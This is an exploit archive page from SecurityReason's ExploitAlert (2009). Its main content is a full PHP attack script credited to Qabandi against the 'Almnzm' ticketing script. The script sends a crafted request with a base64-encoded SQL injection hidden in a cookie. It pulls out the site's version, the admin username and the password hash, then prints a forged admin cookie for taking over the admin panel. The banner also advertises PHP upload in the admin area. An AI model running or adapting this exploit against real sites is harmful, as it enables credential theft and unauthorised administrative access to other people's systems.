|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 6527 Milw0rm ID : 9035 Credit : Qabandi Date : 05.07.2009 Exploit Code : <? print_r(' || || | || o_,_7 _|| . _o_7 _|| q_|_|| o_///_, ( : / (_) / ( . ___________________ _/QQQQQQQQQQQQQQQQQQQ\__ ---Script Almnzm SQL INJECTION __/QQQ/````````````````\QQQ\___ _/QQQQQ/ \QQQQQQ\ ---"Powered by Almnzm" /QQQQ/`` ```QQQQ\ /QQQQ/ \QQQQ\ ---admin cookie create |QQQQ/ By Qabandi \QQQQ| ---Add PhP Ext |QQQQ| |QQQQ| ---Upload php in adminCP |QQQQ| From Kuwait, PEACE... |QQQQ| |QQQQ| |QQQQ| |QQQQ\ iqa[a]hotmail.fr /QQQQ| \QQQQ\ __ /QQQQ/ \QQQQ\ /QQ\_QQQQ/ \QQQQ\ \QQQQQQQ/ \QQQQQ\ /QQQQQ/_ ``\QQQQQ\_____________/QQQ/\QQQQ\_ ``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\ '); if ($argc<3) { print_r(' --------------------------------------------------------------------------- -- Usage: php '.$argv[0].' localhost /mnzm/ --------------------------------------------------------------------------- -- '); die; } $host = $argv[1]; $p = "http://".$host.$argv[2]; function QAB_GET($qabandi, $from){ $content = $from; preg_match_all("/<".$qabandi.">([^<]+)<\/".$qabandi.">/", $content, $out, PREG_PATTERN_ORDER); return $out[1][0]; } $packet ="GET ".$p."index.php?action=creatticket&step=2 HTTP/1.0\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: customer=LTInIFVuSW9OIFNlTGVDdCAxLGNvbmNhdChDSEFSKDYwLDExOCwxMDEsMTE0LDExNS wxMDUsMTExLDExMCw2MiksVmVSc0lvTigpLENIQVIoNjAsNDcsMTE4LDEwMSwxMTQsMTE1LDEwN SwxMTEsMTEwLDYyKSksY29uY2F0KENIQVIoNjAsMTA5LDk3LDEwNSwxMDgsNjIpLGVtYWlsLENI QVIoNjAsNDcsMTA5LDk3LDEwNSwxMDgsNjIpKSw0LDUsNixjb25jYXQoQ0hBUig2MCwxMTIsOTc sMTE1LDExNSw2MikscGFTU1dvcmQsQ0hBUig2MCw0NywxMTIsOTcsMTE1LDExNSw2MikpLDgsY2 9uY2F0KENIQVIoNjAsMTE3LDExNSwxMDEsMTE0LDYyKSxuQU1FLENIQVIoNjAsNDcsMTE3LDExN SwxMDEsMTE0LDYyKSksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMg ZlJPbSBNT0RlckFUb3JzICAvKjpxYWJhbmRpOnFhYmFuZGk=".";\r\n"; $packet.="Connection: Close\r\n\r\n"; $o = @fsockopen($host, 80); if(!$o){ echo "\n[x] No response...\n"; die; } fputs($o, $packet); while (!feof($o)) $data .= fread($o, 1024); fclose($o); $_404 = strstr( $data, "HTTP/1.1 404 Not Found" ); if ( !empty($_404) ){ echo "\n[x] 404 Not Found... Make sure of path. \n"; die; } echo "\n\n---Qabandi Is Here-------------------------------------------\n\n"; $Q_ver = QAB_GET("version", $data); $Q_usr = QAB_GET("user", $data); $Q_pwd = QAB_GET("pass", $data); echo "[q]version:\n".$Q_ver."\n\n"; echo "[q]Admin User:\n".$Q_usr."\n\n"; echo "[q]Admin Hash:\n".$Q_pwd."\n\n"; $qookie = base64_encode(":".$Q_usr.":".$Q_pwd); echo "\n---Admin Cookie:\n"; echo "\n\njavascript:document.cookie='user=".$qookie."';\n\n"; echo "\n\n---Qabandi Was Here------------------------------------------\n\n"; die; ?> Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |